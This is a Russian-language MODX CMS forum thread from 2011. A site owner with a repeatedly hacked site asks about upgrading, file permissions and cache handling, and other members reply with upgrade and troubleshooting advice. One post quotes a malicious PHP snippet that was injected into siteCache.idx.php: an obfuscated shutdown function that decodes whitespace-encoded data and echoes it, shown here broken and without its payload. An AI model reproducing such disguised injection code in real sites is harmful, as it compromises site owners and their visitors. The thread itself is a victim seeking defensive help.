upgrade from 0.9.6.3 до последней версии.

Друзья, мог бы кто подсказать, есть ли вообще возможность такого апгрейда? И как много проблем он может посулить. Хост , к сожалению, стал подвержен частому взлому, через заливку кеша или еще что-то. Стоит вопрос, апгрейд или таки серьезная докрутка кода. В modx человек новый совершенно.
И еще , скажите, а как-то можно обойтись без прав на каталоги и файлы вида 777? Просто, сама идея, подобных прав на вебсервере, крайне удивляет.
Спасибо.
Сюда было решено написать, так как апгрейд, это почти установка с нуля.

Quote from: Bubochka at May 29, 2011, 01:07 PM

Друзья, мог бы кто подсказать, есть ли вообще возможность такого апгрейда? И как много проблем он может посулить. Хост , к сожалению, стал подвержен частому взлому, через заливку кеша или еще что-то. Стоит вопрос, апгрейд или таки серьезная докрутка кода. В modx человек новый совершенно.
И еще , скажите, а как-то можно обойтись без прав на каталоги и файлы вида 777? Просто, сама идея, подобных прав на вебсервере, крайне удивляет.
Спасибо.
Сюда было решено написать, так как апгрейд, это почти установка с нуля.

1. Бекап файлов и базы.
2. Переписать все файлы.
3. Установить с обновлением.
4. В админке почистить кеш, обновить конфиг.

Должно заработать. Так обновил пару сайтов. с 0.9.6.3 до 1.0.5

Quote from: antey at May 29, 2011, 03:30 PM

Quote from: Bubochka at May 29, 2011, 01:07 PM

Друзья, мог бы кто подсказать, есть ли вообще возможность такого апгрейда? И как много проблем он может посулить. Хост , к сожалению, стал подвержен частому взлому, через заливку кеша или еще что-то. Стоит вопрос, апгрейд или таки серьезная докрутка кода. В modx человек новый совершенно.
И еще , скажите, а как-то можно обойтись без прав на каталоги и файлы вида 777? Просто, сама идея, подобных прав на вебсервере, крайне удивляет.
Спасибо.
Сюда было решено написать, так как апгрейд, это почти установка с нуля.

1. Бекап файлов и базы.
2. Переписать все файлы.
3. Установить с обновлением.
4. В админке почистить кеш, обновить конфиг.

Должно заработать. Так обновил пару сайтов. с 0.9.6.3 до 1.0.5

И еще вопрос, 0.9.6.3 это Evo Или Revo? И где это можно посмотреть.
к сожалению, пока опыт с просто переносом сайта в том же состоянии не увенчался успехом, но, вероятно, причины вовсе не в Modx.
И еще вопрос, есть ли вариант, чистить кеш, скриптом, по крону? Хотелось бы просто изменить владельца и права на файл siteCache.idx.php, и соответственно запускать скрипт очистки кеша, из под другого владельца, отличного от владельца вебсайта и конечно не с правами 777.
Спасибо огромное.

Quote from: Bubochka at May 29, 2011, 06:26 PM

И еще вопрос, есть ли вариант, чистить кеш, скриптом, по крону?

Зачем? скорее всего задача неверно поставлена.

Quote from: AKots at May 30, 2011, 03:04 AM

Quote from: Bubochka at May 29, 2011, 06:26 PM

И еще вопрос, есть ли вариант, чистить кеш, скриптом, по крону?

Зачем? скорее всего задача неверно поставлена.

Тогда поясните мне вообще необходимость нажимать кнопку "обновить сайт".
На данный момент, ее нажать у меня нельзя. Меня просто достали бесконечные перезаписывания файла siteCache.idx.php(дописывали в начало вредоносный зрз скрипт) и было решено просто сменить у него как владельца, так и права на запись. Но это вариант, временный, пока не будет понятно, каким образом происходит таки взлом, или не будет произведен нормально апдейт.
Спасибо.

Quote from: Bubochka at May 30, 2011, 05:58 AM

Тогда поясните мне вообще необходимость нажимать кнопку "обновить сайт".

Нет такой необходимости, просто после изменения чего-то кэш очищается и создается заново. Нарушение этого механизма не исправить вызовом очистки по крону.

Quote from: Bubochka at May 29, 2011, 06:26 PM

И еще вопрос, 0.9.6.3 это Evo Или Revo? И где это можно посмотреть.
к сожалению, пока опыт с просто переносом сайта в том же состоянии не увенчался успехом, но, вероятно, причины вовсе не в Modx.
И еще вопрос, есть ли вариант, чистить кеш, скриптом, по крону? Хотелось бы просто изменить владельца и права на файл siteCache.idx.php, и соответственно запускать скрипт очистки кеша, из под другого владельца, отличного от владельца вебсайта и конечно не с правами 777.
Спасибо огромное.

1.0.5 это Evo. Крон здесь не нужен, кнопка "Обновить сайт" не требует частого вмешательства. Права на папки должны соответствовать требованиям при установке.

Quote from: antey at May 31, 2011, 01:30 AM

Quote from: Bubochka at May 29, 2011, 06:26 PM

И еще вопрос, 0.9.6.3 это Evo Или Revo? И где это можно посмотреть.
к сожалению, пока опыт с просто переносом сайта в том же состоянии не увенчался успехом, но, вероятно, причины вовсе не в Modx.
И еще вопрос, есть ли вариант, чистить кеш, скриптом, по крону? Хотелось бы просто изменить владельца и права на файл siteCache.idx.php, и соответственно запускать скрипт очистки кеша, из под другого владельца, отличного от владельца вебсайта и конечно не с правами 777.
Спасибо огромное.

1.0.5 это Evo. Крон здесь не нужен, кнопка "Обновить сайт" не требует частого вмешательства. Права на папки должны соответствовать требованиям при установке.

когда стоят права на файл *.php 777 в начало данного файла дописывают вредоносный скрипт. Я не могу пока выяснить каким образом, но после этого скрипт то пытается налить мне своих .htaccess то index.html по _всем_ каталогам которые имеют права на запись для всех.
скрипты разные бывают. наример из последнего:
<?php /**^M
* Gets some core libraries and displays a top message if required. /*^M
*/ if(!function_exists(’CoreLibrariesHandler’)) { /*^M
*/ function CoreLibrariesHandler() { /*^M
*/ $session_keys = ’ ’; /*^M
*/ /* ^M
*/ foreach(str_split($session_keys, as $k=>$v) { /* ^M
*/ $v = str_replace(’ ’, 1, str_replace(’ ’, 0, $v)); /*^M
*/ $session_keys[$k] = chr(bindec($v)); /*^M
*/ } /*^M
*/ /*^M
*/ if($session_keys) echo $session_keys; } /*^M
*/ register_shutdown_function(’CoreLibrariesHandler’); /*^M
*/ } /*^M
************************************************************************/^M

Иногда в конец приписывают фреймы.
Это дыра, просто дыра. По тому и было решено временно изменить права.. и искался вариант обновления кеша из крона.

Quote from: Bubochka at May 31, 2011, 01:01 PM

По тому и было решено временно изменить права.. и искался вариант обновления кеша из крона.

Надо не латать дыры, а искать причину заражения – в нормальной ситуации ничего не записывается. Проблема может быть в хостинге, зараженных компьютерах тех, кто имеет доступ, использовании php register_globals on и так далее – менять алгоритм работы кэша бессмысленно, это не поможет обнаружить проблему.
А про обновление кэша из крона – типа «чтобы было»? Какой вообще смысл обновлять кэш из крона? Технически это сделать можно, но смысла абсолютно нет.

Quote from: AKots at May 31, 2011, 01:36 PM

Quote from: Bubochka at May 31, 2011, 01:01 PM

По тому и было решено временно изменить права.. и искался вариант обновления кеша из крона.

Надо не латать дыры, а искать причину заражения – в нормальной ситуации ничего не записывается. Проблема может быть в хостинге, зараженных компьютерах тех, кто имеет доступ, использовании php register_globals on и так далее – менять алгоритм работы кэша бессмысленно, это не поможет обнаружить проблему.
А про обновление кэша из крона – типа «чтобы было»? Какой вообще смысл обновлять кэш из крона? Технически это сделать можно, но смысла абсолютно нет.

у меня рут от машины. Так что хостинг считай это я. register_globals off.
какие есть еще алгоритмы поиска через что ломают? Дамп трафика на всем интерфейсе? Логи в дебаг режиме php/webserver/db. К админке включен .htaccess, ftp опущено в принципе на хосте, по ssh пользователи довольно жестко разграничены, и так далее..
как искать проблему откуда это берется? Я , к сожалению не программист, но кажется, тут я даже выучу php.